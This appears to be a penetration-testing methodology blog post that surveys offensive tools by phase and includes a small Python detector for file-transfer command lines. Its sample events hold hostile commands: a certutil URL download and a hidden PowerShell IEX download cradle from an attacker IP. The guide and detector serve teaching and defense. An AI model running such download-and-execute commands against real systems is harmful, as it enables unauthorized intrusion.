# Pentesting Methodology

Comprehensive Penetration Testing Guide

Before any testing begins, it’s helpful to establish clear rules of engagement through pre-engagement activities. Consider defining the scope, objectives, timeline, and legal boundaries, documenting everything in a formal agreement to protect both parties. Resources like PTES (Penetration Testing Execution Standard) and the OWASP Testing Guide can provide useful frameworks for structuring this phase.

Reconnaissance forms the foundation of many penetration tests, involving tools that help with everything from identifying devices on a network to discovering open ports on targeted servers. Common tools include Nmap for network discovery and security auditing, Wireshark for network protocol analysis, Masscan as a fast port scanner, and Rustscan as a modern alternative. For automated reconnaissance workflows, AutoRecon offers multi-threaded network reconnaissance, while nmapAutomator and Reconnoitre provide additional automation capabilities.

Attacking wireless network interface cards (WNICs) takes advantage of the omnidirectional radio waves they transmit using QAM and OFDM modulation schemes. Aircrack-ng, a packet injection and frame-replay suite, performs cryptanalysis to recover WEP and WPA/WPA2 pre-shared key (PSK) keys using various techniques. Additional wireless tools include Wifite for automated wireless attacks, Kismet as a wireless network detector and sniffer, and Fern WiFi Cracker providing a GUI-based approach to wireless security auditing.

OSINT (Open Source Intelligence) involves gathering publicly available information about targets through tools like theHarvester for email, subdomain, and name harvesting, Shodan as a search engine for Internet-connected devices, Maltego for data mining and intelligence gathering, Recon-ng as a web reconnaissance framework, SpiderFoot for automated OSINT collection, and FOCA for metadata analysis. Domain and DNS enumeration can be performed using Sublist3r for subdomain enumeration, Amass for in-depth DNS enumeration, DNSRecon for DNS reconnaissance, Subfinder for passive subdomain discovery, and Assetfinder to find domains and subdomains.

When it comes to HTTP there are many paths that can be taken; pentestbook is a resource often used to aid discovery. Directory and content discovery through crawl and fuzz tools helps uncover hidden files, directories, and endpoints. ffuf serves as a fast web fuzzer that many find effective, while Gobuster provides directory, file, and DNS busting capabilities. Dirbuster offers multi-threaded directory brute-forcing, Feroxbuster enables fast recursive content discovery, and wfuzz acts as a comprehensive web application fuzzer. These tools work well when paired with quality wordlists from SecLists, which provides collections of multiple list types for security assessments, and FuzzDB, which contains attack patterns and predictable resource locations.

Web crawling and spidering can utilize tools like Burp Suite as an integrated platform for web application security testing, OWASP ZAP as a web application security scanner, Hakrawler as a fast web crawler, Katana as a next-generation crawling framework, and GoSpider for fast web spidering. For specific vulnerability testing, SQLmap automates SQL injection exploitation, XSStrike provides advanced XSS detection, Commix handles command injection exploitation, NoSQLMap tests for NoSQL injection vulnerabilities, and Dalfox offers fast XSS scanning capabilities.

API testing can benefit from specialized approaches using tools like Postman as an API testing platform, Arjun for HTTP parameter discovery, FFUF which can be adapted for API fuzzing, and Kiterunner for API endpoint discovery. For CMS-specific testing, WPScan scans WordPress installations, Joomscan targets Joomla vulnerabilities, and Droopescan handles Drupal and Silverstripe scanning.

Exploitation frameworks provide comprehensive platforms for attacking systems, with Metasploit Framework being a widely used exploitation framework, Empire offering post-exploitation capabilities, Covenant as a .NET command and control framework, and Sliver providing a modern C2 framework. Payload generation can utilize msfvenom as part of Metasploit, Shellter for dynamic shellcode injection, and Veil as a payload generator designed for bypassing antivirus. Manual exploitation resources include Exploit-DB as an archive of public exploits, GTFOBins documenting Unix binaries that can bypass security restrictions, LOLBAS covering Living Off The Land Binaries and Scripts for Windows, HackTricks providing comprehensive penetration testing techniques, and PayloadsAllTheThings offering useful payloads and bypasses.

Post-exploitation activities often begin with establishing file transfer capabilities. Once it is set up, Python's http.server module, which is built on socketserver.TCPServer, can share files from the attacking host on port 80. In this example I'll be sharing my privilege escalation tools, using LinPEAS with LinEnum as a backup. File transfer methods include running Python's built-in HTTP server using python3 -m http.server 80, Updog as an improved Python HTTP server with upload capability, Impacket's smbserver for quick SMB servers, Certutil as a Windows built-in file download utility, and various PowerShell download cradles for alternative download methods.
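The file transfer methods listed above all leave a recognisable command line in process-creation telemetry. As an added example that is not part of the original post, the Python below checks constructed process events against rules for each method so a defender can see what these transfers look like on the wire; the rule patterns and sample events are illustrative assumptions, not a vendor's signatures.

```python
"""Flag process command lines matching common pentest file-transfer methods.

Added example for this post: the rules and the sample events below are
constructed here and are not taken from any real host or detection product.
"""
import re

# Constructed process-creation events: (process image, full command line)
SAMPLE_EVENTS = [
    ("python3", "python3 -m http.server 80"),
    ("certutil.exe", "certutil.exe -urlcache -split -f http://10.10.14.5/linpeas.sh linpeas.sh"),
    ("powershell.exe", "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/PowerUp.ps1')"),
    ("python3", "python3 smbserver.py share ./tools -smb2support"),
    ("certutil.exe", "certutil.exe -verify cert.cer"),  # legitimate certutil use, must not match
    ("python3", "python3 app.py --port 8080"),          # unrelated Python process, must not match
]

# Each rule: (name, image pattern, command-line pattern). Both must match,
# which keeps e.g. the word "DownloadFile" in a non-PowerShell process quiet.
RULES = [
    ("python-http-server", r"^python", r"-m\s+http\.server\b"),
    ("certutil-url-download", r"^certutil", r"-urlcache\b.*\bhttps?://"),
    ("powershell-download-cradle", r"^(powershell|pwsh)",
     r"\b(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer)\b"),
    ("impacket-smbserver", r"^python", r"\bsmbserver(\.py)?\b"),
]
COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I)) for name, img, cmd in RULES]


def classify_event(image, cmdline):
    """Return the names of every rule the event matches (empty list if none)."""
    return [name for name, img_re, cmd_re in COMPILED
            if img_re.search(image) and cmd_re.search(cmdline)]


def scan_events(events):
    """Return (image, rule) pairs for every flagged event, preserving input order."""
    hits = []
    for image, cmdline in events:
        for rule in classify_event(image, cmdline):
            hits.append((image, rule))
    return hits


if __name__ == "__main__":
    for image, rule in scan_events(SAMPLE_EVENTS):
        print(f"{rule:28s} {image}")
```

Because each rule also checks the process image, a cradle launched indirectly (for example through cmd.exe) is not caught by these patterns alone; real detections also walk the parent process chain.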

For Linux privilege escalation, additional tools worth considering include Linux Smart Enumeration (LSE) for detailed enumeration, Linux Exploit Suggester to suggest kernel exploits, and pspy to monitor Linux processes without root permissions. Resources like GTFOBins provide Unix binary exploitation references, while HackTricks Linux PrivEsc offers comprehensive privilege escalation techniques.

Windows privilege escalation can employ WinPEAS as the Windows equivalent privilege escalation script, PowerUp as a PowerShell privilege escalation framework, Seatbelt for C# security-oriented enumeration, Watson for Windows vulnerability enumeration, Windows Exploit Suggester to suggest exploits based on patch levels, and PrivescCheck for PowerShell privilege escalation enumeration. Windows-specific resources include LOLBAS for Living Off The Land techniques and HackTricks Windows PrivEsc for detailed Windows privilege escalation methodologies.

Active Directory enumeration and exploitation can benefit from specialized tools like BloodHound for AD relationship mapping and attack path analysis, SharpHound as BloodHound’s data collector, PowerView for PowerShell AD enumeration, Rubeus as a Kerberos abuse toolkit, Impacket providing Python classes for network protocols, CrackMapExec as a versatile tool for pentesting networks, Kerbrute for Kerberos username enumeration, and Mimikatz for credential extraction. AD-specific resources include WADComs as an interactive cheat sheet for Windows and AD, Active Directory Exploitation Cheat Sheet, and HackTricks AD Methodology.

Credential harvesting and cracking can utilize Mimikatz for Windows credential extraction, LaZagne for multi-platform credential recovery, John the Ripper as a versatile password cracker, Hashcat for advanced password recovery, Hydra as a network logon cracker, Medusa for fast parallel password cracking, and CrackStation for online hash lookups. Password lists for these tools include the well-known RockYou list, CrackStation Wordlist as a massive compilation, and Weakpass providing collections of password lists.

Persistence mechanisms can be established using Empire Persistence Modules offering various persistence techniques, PowerSploit Persistence providing PowerShell-based methods, and SharPersist as a Windows persistence toolkit. Pivoting and tunneling enable lateral movement through Chisel as a fast TCP/UDP tunnel over HTTP, Ligolo-ng as a simple lightweight tunneling tool, sshuttle creating a VPN-like tunnel over SSH, Proxychains forcing connections through proxy servers, and Metasploit's built-in pivoting capabilities.

Password attacks split into online and offline categories, with online attacks using Hydra for network logon cracking, Medusa as a speedy parallel password cracker, Patator as a multi-purpose brute-forcer, and Ncrack for high-speed network authentication cracking. Offline password attacks can leverage John the Ripper for general password cracking, Hashcat for advanced password recovery, and Ophcrack specifically for Windows password cracking using rainbow tables.

Social engineering testing can employ phishing frameworks like Gophish as an open-source phishing framework, SET (Social Engineering Toolkit) for comprehensive social engineering testing, King Phisher as a phishing campaign toolkit, and Evilginx2 as a MitM attack framework for phishing credentials.

Reporting and documentation can benefit from tools like Dradis as a collaboration and reporting platform, Serpico for penetration testing report generation, Pwndoc as a pentest reporting application, and Ghostwriter for collaborative report writing and project management. Screenshot and evidence collection can utilize Flameshot as a powerful screenshot tool, Greenshot for Windows screenshots, and Scrot as a command-line screenshot utility.

A typical penetration test proceeds from pre-engagement (scoping, contracts, and rules of engagement) to reconnaissance (passive and active information gathering), then to enumeration of the discovered services and systems, vulnerability identification (searching databases for potential weaknesses), exploitation to gain initial access, post-exploitation (privilege escalation, lateral movement, and persistence), and finally reporting on the entire process. Obtain proper authorization before testing any systems you don't own; unauthorized access carries legal consequences regardless of the intent or methodology used.
